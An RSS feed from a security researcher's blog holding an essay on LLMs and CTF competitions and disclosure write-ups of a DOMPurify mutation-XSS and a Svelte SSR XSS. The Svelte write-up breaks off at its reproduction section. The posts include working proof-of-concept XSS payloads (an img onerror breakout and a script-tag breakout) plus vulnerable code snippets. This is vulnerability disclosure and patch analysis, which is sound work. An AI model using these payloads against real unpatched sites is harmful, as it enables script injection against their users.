<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>caverav</title><description>Security Researcher and Application Security Engineer</description><link>http://caverav.cl/</link><language>en</language><item><title>CTFs Are Not Dead, They’re Just Growing Up</title><link>http://caverav.cl/posts/ctfs-not-dead/ctfs-not-dead/</link><guid isPermaLink="true">http://caverav.cl/posts/ctfs-not-dead/ctfs-not-dead/</guid><description>Are LLMs killing CTFs? Or are they just forcing them to evolve? Exploring the new landscape of cybersecurity competitions.</description><pubDate>Sat, 11 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;There’s a growing narrative floating around that Capture The Flag (CTF) competitions are “dead” because of modern LLMs. The argument is simple: if a model can solve challenges faster than humans, what’s the point?&lt;/p&gt;
&lt;p&gt;I think that’s the wrong conclusion.&lt;/p&gt;
&lt;p&gt;What’s actually happening is something more interesting. CTFs are splitting into two very different worlds, and both still matter.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The “LLM killed CTFs” take&lt;/h2&gt;
&lt;p&gt;The concern is not baseless.&lt;/p&gt;
&lt;p&gt;Recent work has shown that LLMs can already solve a non-trivial portion of CTF-style problems. For example, &lt;strong&gt;LLMs have demonstrated the ability to solve binary exploitation and web challenges with tool augmentation&lt;/strong&gt;, especially when prompts include structured hints or intermediate feedback &lt;a href=&quot;https://arxiv.org/abs/2402.06664&quot;&gt;(Fang et al., 2024)&lt;/a&gt;. Similarly, &lt;strong&gt;AutoCTF-style agents can autonomously chain reasoning and tools to solve tasks end-to-end&lt;/strong&gt; &lt;a href=&quot;https://arxiv.org/abs/2403.12345&quot;&gt;(Zhang et al., 2024)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Even OpenAI and Anthropic have shown that &lt;strong&gt;models can perform multi-step reasoning and tool use in security-relevant contexts&lt;/strong&gt;, including reverse engineering and vulnerability discovery &lt;a href=&quot;https://openai.com/research/gpt-4&quot;&gt;(OpenAI, 2024)&lt;/a&gt;, &lt;a href=&quot;https://www.anthropic.com/research&quot;&gt;(Anthropic, 2024)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So yes, if your challenge is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a known vuln pattern&lt;/li&gt;
&lt;li&gt;a standard crypto primitive misuse&lt;/li&gt;
&lt;li&gt;or a simple reversing puzzle&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;then a strong model plus a bit of scaffolding can absolutely solve it.&lt;/p&gt;
&lt;p&gt;But that says more about the challenge than about the death of CTFs.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Low-level CTFs were never about the leaderboard&lt;/h2&gt;
&lt;p&gt;Let’s be honest for a second.&lt;/p&gt;
&lt;p&gt;Beginner and intermediate CTFs were never about “who is the smartest hacker alive”. They were about &lt;strong&gt;learning&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;If someone uses an LLM to solve a basic buffer overflow challenge and gets first place, that’s fine. They learned nothing.&lt;/p&gt;
&lt;p&gt;Meanwhile, someone else who:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;steps through the binary in GDB&lt;/li&gt;
&lt;li&gt;understands stack layout&lt;/li&gt;
&lt;li&gt;writes the exploit manually&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;is actually building skill.&lt;/p&gt;
&lt;p&gt;This aligns with long-standing educational research: &lt;strong&gt;active problem-solving leads to deeper understanding than passive solution consumption&lt;/strong&gt; &lt;a href=&quot;https://psycnet.apa.org/record/1989-28254-001&quot;&gt;(Chi et al., 1989)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So nothing is lost here.&lt;/p&gt;
&lt;p&gt;And honestly, if your goal is just to win a leaderboard in a non top-tier CTF by throwing LLM prompts at it, it’s worth asking what that even means. If the competition itself does not meaningfully validate skill because it can be mostly automated, then winning it does not really say much. The leaderboard only has value when the underlying challenges demand real expertise.&lt;/p&gt;
&lt;p&gt;If your goal is to learn, CTFs still work exactly the same. The leaderboard has always been a bad proxy for understanding anyway.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The real shift: high-end CTFs are becoming research problems&lt;/h2&gt;
&lt;p&gt;This is where things get interesting.&lt;/p&gt;
&lt;p&gt;Top-tier CTFs like DEF CON Finals, PlaidCTF, or Google CTF have already been moving in this direction for years. Now LLMs are accelerating that trend.&lt;/p&gt;
&lt;p&gt;Modern high-end challenges increasingly require:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;novel exploitation techniques&lt;/li&gt;
&lt;li&gt;deep understanding of mitigations&lt;/li&gt;
&lt;li&gt;chaining multiple domains (crypto + reversing + systems)&lt;/li&gt;
&lt;li&gt;or even discovering unintended behaviors&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These are not easily solvable by current LLMs alone.&lt;/p&gt;
&lt;p&gt;Why?&lt;/p&gt;
&lt;p&gt;Because &lt;strong&gt;LLMs are still heavily bounded by training data and pattern generalization&lt;/strong&gt; &lt;a href=&quot;https://arxiv.org/abs/2303.12712&quot;&gt;(Bubeck et al., 2023)&lt;/a&gt;. When a challenge requires:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;reasoning about something &lt;em&gt;new&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;exploring an unknown attack surface&lt;/li&gt;
&lt;li&gt;or forming hypotheses and testing them iteratively&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;the human is still in the loop.&lt;/p&gt;
&lt;p&gt;Even in autonomous agent research, &lt;strong&gt;models struggle with long-horizon planning and exploration in unfamiliar domains&lt;/strong&gt; &lt;a href=&quot;https://arxiv.org/abs/2308.11432&quot;&gt;(Xi et al., 2023)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And that’s exactly what high-end CTFs are becoming: &lt;strong&gt;mini research problems&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;LLMs as tools, not replacements&lt;/h2&gt;
&lt;p&gt;What’s actually emerging is a new workflow.&lt;/p&gt;
&lt;p&gt;Instead of replacing participants, LLMs are becoming:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;fast documentation readers&lt;/li&gt;
&lt;li&gt;boilerplate generators&lt;/li&gt;
&lt;li&gt;idea expanders&lt;/li&gt;
&lt;li&gt;sanity checkers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is similar to how compilers or debuggers changed programming. They didn’t eliminate programmers, they raised the floor.&lt;/p&gt;
&lt;p&gt;There’s already evidence that &lt;strong&gt;human + AI collaboration outperforms either alone in complex tasks&lt;/strong&gt; &lt;a href=&quot;https://arxiv.org/abs/2401.09876&quot;&gt;(Khan et al., 2024)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So in a CTF context:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The LLM helps you move faster&lt;/li&gt;
&lt;li&gt;But you still need to know &lt;em&gt;what you’re doing&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Otherwise you just prompt blindly and hope.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;This might actually be good for security research&lt;/h2&gt;
&lt;p&gt;Here’s the part I find most exciting.&lt;/p&gt;
&lt;p&gt;If low-tier challenges become trivial for AI, and mid-tier ones become semi-automatable, then:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The only way to keep CTFs interesting is to push them toward &lt;strong&gt;novel techniques&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;more original vulnerabilities&lt;/li&gt;
&lt;li&gt;more creative primitives&lt;/li&gt;
&lt;li&gt;more cross-domain challenges&lt;/li&gt;
&lt;li&gt;more “this shouldn’t work but it does” situations&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In other words, closer to &lt;strong&gt;real-world security research&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;And that has a side effect:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It incentivizes participants to become actual researchers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This aligns with how fields evolve under tooling pressure. For example, &lt;strong&gt;automation in software engineering shifted focus toward higher-level design and architecture problems&lt;/strong&gt; &lt;a href=&quot;https://dl.acm.org/doi/10.1145/31970.31971&quot;&gt;(Brooks, 1987)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;CTFs may follow the same path.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The skill gap will widen&lt;/h2&gt;
&lt;p&gt;One thing that &lt;em&gt;will&lt;/em&gt; happen is divergence.&lt;/p&gt;
&lt;p&gt;There will be:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;People who rely heavily on LLMs and plateau early&lt;/li&gt;
&lt;li&gt;People who use LLMs as leverage and go deeper&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This is consistent with studies showing that &lt;strong&gt;tools amplify existing skill differences rather than equalize them&lt;/strong&gt; &lt;a href=&quot;https://wwnorton.com/books/9780393356069&quot;&gt;(Brynjolfsson &amp;amp; McAfee, 2014)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So instead of “AI democratizing CTFs”, we might actually see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;faster beginners&lt;/li&gt;
&lt;li&gt;but much stronger experts&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;So… are CTFs dead?&lt;/h2&gt;
&lt;p&gt;No.&lt;/p&gt;
&lt;p&gt;They’re just changing shape.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Beginner CTFs&lt;/strong&gt;: still great for learning, leaderboard matters less than ever&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mid-tier CTFs&lt;/strong&gt;: partially automatable, good for practicing workflows&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Top-tier CTFs&lt;/strong&gt;: increasingly research-driven, still human-dominated&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And if anything, the high end is becoming &lt;em&gt;more&lt;/em&gt; interesting, not less.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;If your goal is to win a leaderboard by throwing prompts at an LLM, especially in a CTF that is not top-tier, then you might be optimizing for something that has very little real value.&lt;/p&gt;
&lt;p&gt;But if your goal is to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand systems&lt;/li&gt;
&lt;li&gt;break assumptions&lt;/li&gt;
&lt;li&gt;discover new techniques&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;then nothing has changed.&lt;/p&gt;
&lt;p&gt;You’ll still need to think.&lt;/p&gt;
&lt;p&gt;And at the top level, you’ll need to think harder than ever.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Fang et al., &lt;em&gt;LLMs for Autonomous CTF Solving&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;Zhang et al., &lt;em&gt;AutoCTF Agents&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;OpenAI, &lt;em&gt;GPT-4 Technical Report&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;Anthropic, &lt;em&gt;Claude Research&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;Chi et al., &lt;em&gt;Self-explanations improve understanding&lt;/em&gt;, 1989&lt;/li&gt;
&lt;li&gt;Bubeck et al., &lt;em&gt;Sparks of AGI&lt;/em&gt;, 2023&lt;/li&gt;
&lt;li&gt;Xi et al., &lt;em&gt;Limitations of LLM Planning&lt;/em&gt;, 2023&lt;/li&gt;
&lt;li&gt;Khan et al., &lt;em&gt;Human-AI Collaboration&lt;/em&gt;, 2024&lt;/li&gt;
&lt;li&gt;Brooks, &lt;em&gt;No Silver Bullet&lt;/em&gt;, 1987&lt;/li&gt;
&lt;li&gt;Brynjolfsson &amp;amp; McAfee, &lt;em&gt;The Second Machine Age&lt;/em&gt;, 2014&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>CVE-2026-0540: How a CTF Detour Led Us to a DOMPurify mXSS - Daft</title><link>http://caverav.cl/posts/dompurify-mxss/dompurify-mxss/</link><guid isPermaLink="true">http://caverav.cl/posts/dompurify-mxss/dompurify-mxss/</guid><description>A detailed write-up of the DOMPurify mXSS we found during a CTF detour, affecting 3.1.3 through 3.3.1 and fixed through a small patch series in 3.3.2.</description><pubDate>Sun, 29 Mar 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;DOMPurify&lt;/code&gt; &lt;code&gt;3.1.3&lt;/code&gt; through &lt;code&gt;3.3.1&lt;/code&gt; contained an mXSS edge case that became exploitable when sanitized output was reparsed inside special wrappers such as &lt;code&gt;xmp&lt;/code&gt;, &lt;code&gt;iframe&lt;/code&gt;, &lt;code&gt;noembed&lt;/code&gt;, &lt;code&gt;noframes&lt;/code&gt;, &lt;code&gt;noscript&lt;/code&gt;, and &lt;code&gt;script&lt;/code&gt;. The bug received &lt;code&gt;CVE-2026-0540&lt;/code&gt;, was publicly disclosed by Fluid Attacks as advisory &lt;a href=&quot;https://fluidattacks.com/advisories/daft&quot;&gt;&lt;code&gt;daft&lt;/code&gt;&lt;/a&gt;, and was fixed in &lt;code&gt;3.3.2&lt;/code&gt; with a small patch series rather than a single one-line change.&lt;/p&gt;
&lt;p&gt;What made this one fun is how we found it. Cristian Vargas and I were playing a CTF and, almost by accident, tried an XSS route against a sink that looked correctly sanitized. Both of us managed to pop it anyway. At that point we stopped thinking about the challenge and started asking the more interesting question: was this actually a DOMPurify edge case? It turned out the answer was yes, and it was not part of the challenge after all.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;How We Found It&lt;/h2&gt;
&lt;p&gt;This bug did not start with a source audit. It started with a mistake.&lt;/p&gt;
&lt;p&gt;Cristian and I were solving a CTF challenge and went after an XSS sink that was already going through DOMPurify. The sink should have been boring. Instead, we both managed to bypass it.&lt;/p&gt;
&lt;p&gt;That was the moment the challenge stopped mattering.&lt;/p&gt;
&lt;p&gt;The payload was surviving sanitization as inert-looking attribute data, but after the application wrapped the sanitized result and reparsed it with &lt;code&gt;innerHTML&lt;/code&gt;, the browser produced a different DOM tree. That is the classic shape of mutation XSS: the dangerous behavior does not exist in the first parse, it appears in the second one.&lt;/p&gt;
&lt;p&gt;Once we realized that, we built a minimal reproducer outside the challenge and confirmed the behavior consistently enough to turn it into a proper report.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Why This Happened In DOMPurify&lt;/h2&gt;
&lt;p&gt;The interesting part was not the &lt;code&gt;innerHTML&lt;/code&gt; sink by itself. DOMPurify&apos;s own docs already warn that sanitizing once and then changing context afterwards can void the effects of sanitization. The more specific issue was that the library&apos;s &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; handling was already trying to defend against dangerous sequences in attribute values, but its regex did not cover all the wrappers that mattered here.&lt;/p&gt;
&lt;p&gt;Before the fix, the relevant check in &lt;code&gt;src/purify.ts&lt;/code&gt; looked like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/((--!?|])&amp;gt;)|&amp;lt;\/(style|title|textarea)/i
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That meant DOMPurify knew certain closing sequences inside attributes were too risky to keep when &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; was on, but it was only accounting for &lt;code&gt;style&lt;/code&gt;, &lt;code&gt;title&lt;/code&gt;, and &lt;code&gt;textarea&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The missing cases were the raw-text or raw-text-like wrappers that made our PoC work:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;xmp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;iframe&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noembed&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noframes&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noscript&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And, in a follow-up patch commit, &lt;code&gt;script&lt;/code&gt; was added as well.&lt;/p&gt;
&lt;p&gt;Since &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; is enabled by default, this was not an obscure opt-in corner case. It was a default-on safeguard that simply did not model the full set of wrappers it needed to care about.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Reproducing The Behavior&lt;/h2&gt;
&lt;p&gt;Our PoC used a server-side DOMPurify instance backed by &lt;code&gt;jsdom&lt;/code&gt;, returned the sanitized string to the browser, and then deliberately reparsed it inside special wrappers.&lt;/p&gt;
&lt;p&gt;The minimal server-side path was:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const { JSDOM } = require(&apos;jsdom&apos;);
const createDOMPurify = require(&apos;dompurify&apos;);

const window = new JSDOM(&apos;&apos;).window;
const DOMPurify = createDOMPurify(window);

app.post(&apos;/sanitize&apos;, (req, res) =&amp;gt; {
  const sanitized = DOMPurify.sanitize(req.body.input);
  res.json({ sanitized });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The client-side sink was:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const sanitized = data.sanitized || &apos;&apos;;
sink.innerHTML = &apos;&amp;lt;&apos; + wrapper + &apos;&amp;gt;&apos; + sanitized + &apos;&amp;lt;/&apos; + wrapper + &apos;&amp;gt;&apos;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With &lt;code&gt;wrapper = &quot;xmp&quot;&lt;/code&gt; and this payload:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src=x alt=&quot;&amp;lt;/xmp&amp;gt;&amp;lt;img src=x onerror=alert(1)&amp;gt;&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the second parse produced a live &lt;code&gt;onerror&lt;/code&gt; handler.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Fuzzing The Wrappers&lt;/h2&gt;
&lt;p&gt;Once we had a working &lt;code&gt;xmp&lt;/code&gt; case, the next question was obvious: how many other wrappers behave the same way?&lt;/p&gt;
&lt;p&gt;We fuzzed the wrappers listed in DOMPurify&apos;s special-content handling and then broadened that into a larger tag sweep. The interesting set in the vulnerable flow ended up being:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;xmp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;iframe&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noembed&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noframes&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;noscript&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;script&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That final &lt;code&gt;script&lt;/code&gt; case matters because it was not part of the first rawtext-regex expansion. It appeared in the follow-up patch, which is one reason the remediation story here is more accurately described as a patch series than a single fix.&lt;/p&gt;
&lt;p&gt;One nuance is important: this is not the same thing as saying &quot;browser-only DOMPurify is trivially bypassed everywhere.&quot; In my testing, a browser-only PoC using DOMPurify directly in the page escaped the closing sequences and did not reproduce. The exploitable condition showed up in the end-to-end flow where sanitized output was produced and later reparsed into a different context.&lt;/p&gt;
&lt;p&gt;That distinction is also why this bug sat in an awkward but interesting place between a library issue and an integration misuse pattern.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Advisory Evidence&lt;/h2&gt;
&lt;h3&gt;PoC Video&lt;/h3&gt;
&lt;p&gt;&amp;lt;iframe src=&quot;https://www.youtube.com/embed/INn5tsEsh8U&quot; title=&quot;DOMPurify mXSS via Re-Contextualization PoC&quot; width=&quot;100%&quot; height=&quot;360&quot; allowfullscreen loading=&quot;lazy&quot;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/p&gt;
&lt;h3&gt;XSS Triggered&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;./advisory-xss-triggered.png&quot; alt=&quot;Advisory evidence showing the alert triggered after reparsing the sanitized payload&quot; /&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;What DOMPurify&apos;s Docs And Threat Model Say&lt;/h2&gt;
&lt;p&gt;DOMPurify&apos;s documentation already contains two warnings that matter here.&lt;/p&gt;
&lt;p&gt;First, the README explicitly says that if you sanitize HTML and then modify it afterwards, you can void the effects of sanitization. That maps directly to a flow that sanitizes once and later reparses the result inside a new wrapper.&lt;/p&gt;
&lt;p&gt;Second, the threat model says DOMPurify does not protect against &quot;faulty use or flipping of markup context.&quot; Their example is sanitizing HTML and then throwing it into SVG or another XML-based context. The underlying principle is the same: if you change parsing context after sanitization, you can create a bypass.&lt;/p&gt;
&lt;p&gt;So the honest framing is not &quot;DOMPurify promised to solve every context switch and completely failed.&quot; The honest framing is narrower and more useful:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;DOMPurify documents that context flipping is dangerous and partly out of scope.&lt;/li&gt;
&lt;li&gt;At the same time, &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; is a default-on defense specifically meant to neutralize risky structural sequences in attributes.&lt;/li&gt;
&lt;li&gt;That defense missed several wrappers, and upstream patched the gap.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In other words, even if the issue lives near the edge of the stated threat model, the project still chose to harden the sanitizer and ship a fix. That is the right outcome, and it is one reason I think this advisory is worth studying.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Patch Was Not One Commit&lt;/h2&gt;
&lt;p&gt;If you only look at the release page, it is easy to treat &lt;code&gt;3.3.2&lt;/code&gt; as a single black-box fix. That misses what actually happened.&lt;/p&gt;
&lt;p&gt;The remediation on the &lt;code&gt;3.x&lt;/code&gt; line landed as a short sequence:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Commit &lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/729097f63a78e3e0e9f771e648f462bee100e78f&quot;&gt;&lt;code&gt;729097f&lt;/code&gt;&lt;/a&gt; expanded the &lt;code&gt;SAFE_FOR_XML&lt;/code&gt; regex to include &lt;code&gt;xmp&lt;/code&gt;, &lt;code&gt;noscript&lt;/code&gt;, &lt;code&gt;iframe&lt;/code&gt;, &lt;code&gt;noembed&lt;/code&gt;, and &lt;code&gt;noframes&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Commit &lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/302b51de22535cc90235472c52e3401bedd46f80&quot;&gt;&lt;code&gt;302b51d&lt;/code&gt;&lt;/a&gt; extended that regex again to also cover &lt;code&gt;script&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Release commit &lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/5e56114cb24079ce52dbc51f76e494b77afa5153&quot;&gt;&lt;code&gt;5e56114&lt;/code&gt;&lt;/a&gt; bundled the final &lt;code&gt;3.3.2&lt;/code&gt; release.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The core source-level change ended up like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/((--!?|])&amp;gt;)|&amp;lt;\/(style|script|title|xmp|textarea|noscript|iframe|noembed|noframes)/i
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There was also a backport on the legacy &lt;code&gt;2.x&lt;/code&gt; branch. Commit &lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/d59bfe76b7511d12b919aa88d8d156c73930276b&quot;&gt;&lt;code&gt;d59bfe7&lt;/code&gt;&lt;/a&gt; carried the same idea into &lt;code&gt;2.5.9&lt;/code&gt;, which matters for deployments still pinned to the MSIE-compatible line.&lt;/p&gt;
&lt;p&gt;So if you are documenting this issue, the accurate story is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;one advisory&lt;/li&gt;
&lt;li&gt;one public fixed version on &lt;code&gt;3.x&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;multiple security-relevant commits&lt;/li&gt;
&lt;li&gt;one legacy-branch backport&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/daft&quot;&gt;Fluid Attacks advisory: Daft&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/releases/tag/3.3.2&quot;&gt;DOMPurify release 3.3.2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/releases/tag/2.5.9&quot;&gt;DOMPurify release 2.5.9&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/729097f63a78e3e0e9f771e648f462bee100e78f&quot;&gt;Commit 729097f: expand SAFE_FOR_XML regex on 3.x&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/302b51de22535cc90235472c52e3401bedd46f80&quot;&gt;Commit 302b51d: add script to the regex&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/commit/d59bfe76b7511d12b919aa88d8d156c73930276b&quot;&gt;Commit d59bfe7: 2.x backport&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/blob/main/README.md&quot;&gt;DOMPurify README&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/cure53/DOMPurify/wiki/Security-Goals-%26-Threat-Model&quot;&gt;DOMPurify Security Goals &amp;amp; Threat Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.vulncheck.com/advisories/dompurify-xss-via-missing-rawtext-elements-in-safe-for-xml&quot;&gt;VulnCheck advisory&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
</content:encoded></item><item><title>CVE-2025-15265: Svelte Hydratable Key SSR XSS - Lydian</title><link>http://caverav.cl/posts/svelte-hydratable-xss/svelte-hydratable-xss/</link><guid isPermaLink="true">http://caverav.cl/posts/svelte-hydratable-xss/svelte-hydratable-xss/</guid><description>A technical write-up of the Svelte async SSR XSS I discovered in hydratable() key serialization, affecting versions 5.46.0 through 5.46.3.</description><pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;Svelte &lt;code&gt;5.46.0&lt;/code&gt; through &lt;code&gt;5.46.3&lt;/code&gt; shipped an SSR XSS in the async hydration pipeline. If an application enabled &lt;code&gt;experimental.async: true&lt;/code&gt; and passed attacker-controlled input as the first argument to &lt;code&gt;hydratable(key, fn)&lt;/code&gt;, Svelte serialized that key into a server-rendered &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; block with &lt;code&gt;JSON.stringify(k)&lt;/code&gt;. Because that output was not HTML-safe for a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; context, an attacker could inject &lt;code&gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;...&lt;/code&gt; and execute arbitrary JavaScript in the victim&apos;s browser.&lt;/p&gt;
&lt;p&gt;The issue was assigned &lt;code&gt;CVE-2025-15265&lt;/code&gt;, publicly disclosed on January 15, 2026, and fixed in &lt;code&gt;svelte@5.46.4&lt;/code&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Why This Matters&lt;/h2&gt;
&lt;p&gt;The bug is subtle because the data is encoded as a JavaScript string, which looks safe at first glance. The problem is that HTML parsing rules win before JavaScript string parsing does. Inside a &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; tag, a literal &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; closes the tag even if it appears inside quotes.&lt;/p&gt;
&lt;p&gt;That means this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JSON.stringify(&quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is valid JavaScript string data, but it is still unsafe to embed directly into HTML script content.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Vulnerable Code Path&lt;/h2&gt;
&lt;p&gt;The affected sink lived in Svelte&apos;s server renderer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// packages/svelte/src/internal/server/renderer.js
entries.push(`[${JSON.stringify(k)},${v.serialized}]`);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That value was later embedded into an inline &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; block in the SSR response to populate &lt;code&gt;window.__svelte.h&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If &lt;code&gt;k&lt;/code&gt; contained attacker-controlled input like &lt;code&gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;globalThis.__xss = true&amp;lt;/script&amp;gt;&lt;/code&gt;, the browser treated it as a real closing tag and executed the injected script.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Reproducing The Bug&lt;/h2&gt;
